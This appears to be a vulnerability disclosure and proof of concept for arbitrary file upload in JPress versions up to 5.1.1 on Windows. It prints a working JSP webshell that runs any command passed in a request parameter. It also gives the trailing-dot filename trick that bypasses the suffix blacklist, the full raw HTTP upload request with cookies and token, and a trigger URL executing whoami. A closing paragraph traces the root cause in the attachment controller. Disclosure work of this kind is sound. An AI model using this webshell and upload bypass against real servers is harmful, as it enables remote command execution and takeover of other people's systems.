≤5.1.1
https://github.com/JPressProjects/jpress
Jpress until v5.1.1 has arbitrary file uploads on the windows platform, and the construction of non-standard file formats such as .jsp. can lead to arbitrary command execution
After setting up the project, log in to the backend with weak passwods admin/admin,then select附件→根目录 and click 上传
Let's choose a webshell file with the following code:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>To make an upload, modify the file suffix b.jspto b.jsp., we can bypass the system's check for the file suffix and upload it to the tomcat root directory
Then visit: [http://127.0.0.1:8080/b.%6a%73%70?pwd=023&i=whoami], execute the command whoami, you can see that the system parses the webshell and successfully executes the command whoami
POST /admin/attachment/doUplaodRootFile?csrf_token=ff67749ed950d998b909645f051b985f HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 484
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOH6mHWg1yTaNq5YE
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/attachment/root
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _jpanonym=MWEyNGExMmNlOGZjNjRiZGZkYWJlMDI4ZDY0ZDVhZjUjMTcyODU1NjczMDExNiMzMTUzNjAwMCNPVE01TmpJMVpqZGtPVFk1TkRoaFlXRmhOVGRsTVRjMVl6Wm1ZelF3TXpZPQ==; _jpuid=YmMxZTA2ODJjYjVmOGVkMDkwYWNmNjUyNjNkZjMxYjEjMTcyODU1Njc0ODk3NyMxNzI4MDAjTVE9PQ==; csrf_token=ff67749ed950d998b909645f051b985f; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1728556751; HMACCOUNT=E4C3DC92B0190419; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1728556858
Connection: close
------WebKitFormBoundaryOH6mHWg1yTaNq5YE
Content-Disposition: form-data; name="files[]"; filename="b.jsp."
Content-Type: application/octet-stream
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
------WebKitFormBoundaryOH6mHWg1yTaNq5YE--
The vulnerability is located at io.jpress.web.admin._AttachmentController#doUplaodRootFilemethod, lines188 calls the AttachmentUtils#isUnsafe method
Here, the file upload suffix is filtered to determine whether the suffix is in the following blacklist:
Therefore, we can use the features of the Windows platform to upload file names that do not comply with the Windows file naming rules, such as changing b.jsp to b.jsp. , and the Windows system will automatically remove the content after the non-compliant symbols, so as to bypass the blacklist policy and upload any files